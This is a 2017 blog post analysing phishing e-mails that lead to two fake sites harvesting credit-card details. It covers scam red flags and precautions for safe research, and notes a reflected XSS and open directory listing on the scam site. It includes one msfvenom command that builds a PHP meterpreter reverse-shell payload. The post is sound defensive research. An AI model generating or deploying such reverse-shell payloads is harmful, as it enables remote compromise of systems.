Post by: Berk

This is a brief analysis of the spam e-mails I received during September 2017. Now, It would have been more fun if I were to run into some neat payloads, however the mails I received are mostly phishing mails. This is a stupid, fun and dangerous practice. I don't recommend doing it.

Lets begin!

We login to our mail account and navigate to the spam folder. We are bound to see some potential phishing mail.

After we take ne necessary precautions we open these mails carefully, without clicking on any links and note them down to see where they lead.

During this process there are a some things we must be careful about, such as the following.

  • Running a sniffer in the background (wireshark, tcpdump, etc.),
  • Intercepting the traffic with a proxy (Burpsuite, Tamperdata, etc.),
  • Checking the ongoing connections using netstat every once in a while.
  • Doing all of the above and following in a virtual machine,
  • Making sure that no information that can be traced back to you (IP adresses, MAC adresses, user-agent information etc.) is disclosed to the malicious site. 
  • Making sure that there is no information stored on the device that can be traced back to you.
  • Setting a strong admin/root password on the device.
  • Making sure that the computer/device is in an isolated internal network.
  • Making sure you burn/melt/trash the computer/device you used. 

The sniffer and the proxy will mostly be used to see what happened post-mortem. Although we can theoretically keep ourselves safe by not running certain scripts etc. whilst intercepting the traffic, we must --for safety, assume that we will get owned. This is a long process, we might make stupid mistakes like pressing ctrl + f trying to search for a keyword and end up forwarding a request. In the end, we are human and we make mistakes. We must take all necessary precautions and prepare for the worst. For those who take comfort in using a VM, do not forget that there are VM escape exploits around the internet.

GoDaddy Logo Design - Credit Card Information Theft

We open our first mail. It pretends to have a link with the domain name, which I registered using GoDaddy (Just run a whois query on the site, its not a big secret.) This, however does not mean that this spam e-mail was tailored just for me. This looks like automated mail generation & delivery.

There are a few scam red flags in this e-mail that should immediately gain our suspicion.

    1. It is suggested that something negative is happening and that it should be fixed.(Creating demand)
    1. It is suggested that "GoDaddy Designs" can fix this problem. (Answering to the demand)
    2. We are given a ridiculously high discount which is %80. (Too good to be true)  
    3. We are given 24 hours or else we lose our shot. (Creating urgency)

We come across these kind of techniques often in advertisements.

When we visit one of the links in the e-mail, we will be greeted by a page that claims to design logos for GoDaddy domains. (Note that at this point I did not send the request yet.)

In cases like this one, some pages might try to run malicious scripts. When we are intercepting requests with our proxy we must keep this in mind. Remember that generating a malicious PHP script is as easy as this:
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=6666 -f raw > meterpreter.php

When we visit the page, we are asked to fill out a bunch of forms to make it look legitimate and to gather more information about the victim. After we are done sending pages of information, we are at last, greeted by the following page.

Without any further ado, we fill out the form with random data. I entered string values instead of integer values just to check if there was any control mechanism.

There wasn't. The moment we click on "Activate Now!" the POST request we are about to send is caught by our proxy and we recieve no errors. This means that there wasn't any kind of input control mechanism in the html. We also could have looked at the source code.

When we send the request through, we are told that we will be contacted by the "design consultant team". If we had entered valid credit card information, we would have got it stolen.

If we are to take a look at the other similar e-mails, we come across other websites that use pretty much the same scripts.



Register Site - Credit Card Information Theft

One other spam mail is like the following.

If we click on the red register button, we are redirected to the following page.

It should be clear to us immediately that this is another phishing site by taking a look at the source code.
 When we try to leave the website, we will be alerted with strings like  "WAIT! Your Website Has Not Been Registered! You Are At Risk..." and so on. If we receive a pop-up message with exclamation marks when we try to leave a website, it is time to raise some serious, suspicion :) .

When we stay idle for some amount of time, we are greeted by the following form

This is again a suspicious action because we are told that %50 of something is complete, however we did not perform any action rather than simply visiting the site. But, for the sake of research...we fill the form!

The light blue line censors the external IP address I used whilst visiting the site. This is not necessary as the IP address, if needed can be easily obtained through the web server logs. Here, our IP address is probably noted so the scammer(s) do not have to deal with grepping the IP address from the logs.

In order to make the process look more legitimate and fool the user, we are asked to enter a "coupon code" that came already written in the bar.

Now, here comes the moment we have been waiting for...It asks for our credit card information!

Unlike the previous "GoDaddy Logo Design" hoax, this one actually throws an error no matter what we enter. Now, I did not try providing the page with valid credit card information but I highly doubt it tries to withdraw money from it automatically.

When we try to leave the site, we are greeted with two different errors.

If we try to understand how the error messages are generated, we can see that the format is like the following.
 errors[any int valuei]= "string to be alerted in the pop-up"

Lets write something of our own choosing in there.

We can see that whatever we wrote is alerted back at us. Hurray! its a useless XSS.

Here is the portion of the source code that generates the alert. 'Rastgele-bir-seyler' translates to 'Some-random-things' in Turkish.

If we try to visit the other URLs we come across when intercepting the traffic with our proxy, we quickly find that the website allows directory browsing.
We can see that there are other pages different in design, that do the same thing as the previous page.
The reason for this could be to refer to different people or just sloppy work. 

Red Flag: In an other version of the page, there is a timer below to create a sense of urgency.

When we run a whois query on the website, we see that they use a "Whois Privacy Protection Service".

At this point we can end our research. Lets see what kinds of spam mail I get in october. Of course, we can always use google and other search engines to find similar websites without having to wait for spam mail. However I find this approach more satisfying as im the one who is actually targeted. Instead of just seeing the website, we get to see the mails and how they are written and think about how they might have been automatized.

IMPORTANT NOTICE: If you are not sure of yourself and if you are not willing to get rid of the device you are using, do not do this kind of research. You might come across 0-day exploits which you did not know existed. From browser exploits to logic bombs being planted on your device, ANYTHING can happen. Please be responsible and mindful of the dangers.